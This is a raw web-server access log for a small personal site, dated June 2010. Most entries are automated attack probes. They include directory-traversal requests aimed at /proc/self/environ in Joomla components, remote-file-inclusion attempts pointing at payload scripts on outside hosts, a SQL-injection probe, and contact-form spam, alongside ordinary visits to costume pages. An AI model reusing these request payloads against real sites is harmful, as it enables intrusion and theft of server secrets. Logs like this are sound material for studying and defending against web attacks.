79.137.233.6 - - [28/Jun/2010:23:23:17 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:23:17 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:23:17 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:23:36 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.228.107.2 - - [28/Jun/2010:23:25:25 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
79.137.233.6 - - [28/Jun/2010:23:25:36 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:25:36 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:25:36 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.126.234.29 - - [28/Jun/2010:23:26:45 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.126.234.29 - - [28/Jun/2010:23:26:45 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.126.234.29 - - [28/Jun/2010:23:26:46 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.126.234.29 - - [28/Jun/2010:23:26:46 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.126.234.29 - - [28/Jun/2010:23:26:46 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.115.111.248 - - [28/Jun/2010:23:26:49 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
194.126.234.29 - - [28/Jun/2010:23:26:49 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.126.234.29 - - [28/Jun/2010:23:27:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.126.234.29 - - [28/Jun/2010:23:27:02 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.126.234.29 - - [28/Jun/2010:23:27:02 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
213.171.37.206 - - [28/Jun/2010:23:27:06 -0500] "GET /language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.808"
213.171.37.206 - - [28/Jun/2010:23:27:06 -0500] "GET /logs/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
62.149.175.27 - - [28/Jun/2010:23:31:12 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
62.149.175.27 - - [28/Jun/2010:23:31:14 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
62.149.175.27 - - [28/Jun/2010:23:31:16 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
203.147.62.92 - - [28/Jun/2010:23:34:03 -0500] "GET /logs/access_log.1274054400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:23:34:07 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:23:34:07 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.121.216.99 - - [28/Jun/2010:23:34:19 -0500] "GET /logs/access_log.1276300800/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.216.99 - - [28/Jun/2010:23:34:19 -0500] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.216.99 - - [28/Jun/2010:23:34:20 -0500] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
208.85.6.42 - - [28/Jun/2010:23:35:54 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:35:54 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:35:54 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:35:54 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:35:54 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:35:54 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:35:54 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:35:55 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:35:55 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:35:55 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:35:55 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:35:55 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:36:21 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:36:21 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:36:21 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:36:22 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:36:22 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:36:22 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.250.252.241 - - [28/Jun/2010:23:36:49 -0500] "GET /logs/access_log.1274054400 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
174.121.216.99 - - [28/Jun/2010:23:37:09 -0500] "GET /logs/access_log.1276041600/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
213.171.37.206 - - [28/Jun/2010:23:37:42 -0500] "GET /language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.808"
213.171.37.206 - - [28/Jun/2010:23:37:42 -0500] "GET /logs/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
213.171.37.206 - - [28/Jun/2010:23:37:42 -0500] "GET /logs/access_log.1276473600/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.808"
216.131.96.193 - - [28/Jun/2010:23:40:59 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:40:59 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:40:59 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:41:03 -0500] "GET /logs/access_log.1277164800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
83.169.4.193 - - [28/Jun/2010:23:41:54 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
83.169.4.193 - - [28/Jun/2010:23:41:55 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
83.169.4.193 - - [28/Jun/2010:23:41:55 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
83.169.4.193 - - [28/Jun/2010:23:42:02 -0500] "GET /logs/access_log.1277164800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
93.186.192.124 - - [28/Jun/2010:23:43:24 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:23:43:24 -0500] "GET /logs/access_log.1266710400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:23:43:24 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:23:44:12 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:23:44:12 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:23:44:12 -0500] "GET /logs/access_log.1266710400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
83.169.4.193 - - [28/Jun/2010:23:44:28 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
83.169.4.193 - - [28/Jun/2010:23:44:28 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
83.169.4.193 - - [28/Jun/2010:23:44:29 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
208.85.6.42 - - [28/Jun/2010:23:45:13 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:45:13 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:45:14 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:45:14 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:45:14 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:45:14 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:45:14 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:45:14 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:45:14 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:45:14 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:45:14 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:45:14 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.205.67.73 - - [28/Jun/2010:23:45:42 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
67.205.67.73 - - [28/Jun/2010:23:45:42 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.169.4.193 - - [28/Jun/2010:23:46:10 -0500] "GET /logs/access_log.1277164800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
208.85.6.42 - - [28/Jun/2010:23:46:32 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:46:32 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:46:32 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:46:32 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:46:33 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.85.6.42 - - [28/Jun/2010:23:46:33 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
216.131.96.193 - - [28/Jun/2010:23:46:33 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
83.169.4.193 - - [28/Jun/2010:23:47:10 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
216.180.240.110 - - [28/Jun/2010:23:47:16 -0500] "GET //index.php?option=com_shoutbox&controller=' HTTP/1.1" 404 294 "-""libwww-perl/5.831"
93.186.192.124 - - [28/Jun/2010:23:49:40 -0500] "GET /logs/access_log.1266710400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:23:49:40 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:23:49:40 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
83.169.4.193 - - [28/Jun/2010:23:49:50 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
216.131.96.193 - - [28/Jun/2010:23:49:57 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.195.112.180 - - [28/Jun/2010:23:50:17 -0500] "GET /logs/access_log.1197676800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.228.107.2 - - [28/Jun/2010:23:50:23 -0500] "GET /logs/access_log.1276819200//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [28/Jun/2010:23:50:24 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [28/Jun/2010:23:50:24 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
89.138.98.184 - - [28/Jun/2010:23:50:57 -0500] "GET /logs/access_log.1219881600 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1219881600""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)"
89.138.98.184 - - [28/Jun/2010:23:50:58 -0500] "GET / HTTP/1.0" 200 991 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)"
216.180.240.110 - - [28/Jun/2010:23:51:48 -0500] "GET /logs/access_log.1275868800//index.php?option=com_shoutbox&controller=' HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:51:49 -0500] "GET //index.php?option=com_shoutbox&controller=' HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:51:49 -0500] "GET /logs//index.php?option=com_shoutbox&controller=' HTTP/1.1" 404 299 "-""libwww-perl/5.831"
67.195.112.180 - - [28/Jun/2010:23:53:56 -0500] "GET /logs/access_log.1217116800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.171.37.206 - - [28/Jun/2010:23:58:07 -0500] "GET /logs/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
213.171.37.206 - - [28/Jun/2010:23:58:07 -0500] "GET /language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.808"
213.171.37.206 - - [28/Jun/2010:23:58:07 -0500] "GET /logs/access_log.1276041600/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.808"
213.171.37.206 - - [28/Jun/2010:23:58:12 -0500] "GET /logs/access_log.1276732800/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.808"
213.171.37.206 - - [28/Jun/2010:23:58:38 -0500] "GET /logs/access_log.1276041600%20/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.808"
85.140.18.197 - - [28/Jun/2010:23:58:40 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://ru.wikipedia.org/wiki/%D0%9D%D0%B0%D1%80%D0%BE%D0%B4%D0%BD%D1%8B%D0%B9_%D0%BA%D0%BE%D1%81%D1%82%D1%8E%D0%BC""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [28/Jun/2010:23:58:41 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [28/Jun/2010:23:58:43 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [28/Jun/2010:23:58:44 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [28/Jun/2010:23:58:44 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [28/Jun/2010:23:58:44 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [28/Jun/2010:23:58:44 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [28/Jun/2010:23:58:46 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [28/Jun/2010:23:58:51 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2227 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [28/Jun/2010:23:58:51 -0500] "GET /costume/costume97%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [28/Jun/2010:23:58:51 -0500] "GET /costume/costume98%20copy.JPG HTTP/1.1" 200 16840 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [28/Jun/2010:23:58:51 -0500] "GET /costume/costume99%20copy.JPG HTTP/1.1" 200 16783 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [28/Jun/2010:23:58:51 -0500] "GET /costume/costume103%20copy.JPG HTTP/1.1" 200 16604 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [28/Jun/2010:23:58:51 -0500] "GET /costume/costume102%20copy.JPG HTTP/1.1" 200 14869 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [28/Jun/2010:23:58:51 -0500] "GET /costume/costume101%20copy.JPG HTTP/1.1" 200 16134 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [28/Jun/2010:23:58:52 -0500] "GET /costume/costume104.JPG HTTP/1.1" 200 60508 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
75.125.254.98 - - [29/Jun/2010:00:00:17 -0500] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:00:00:17 -0500] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.834"
83.169.4.193 - - [29/Jun/2010:00:00:21 -0500] "GET /logs/access_log.1277164800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
83.169.4.193 - - [29/Jun/2010:00:00:21 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
83.169.4.193 - - [29/Jun/2010:00:00:22 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
85.140.18.197 - - [29/Jun/2010:00:00:50 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:00 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:00 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:01 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:01 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:01 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:01 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
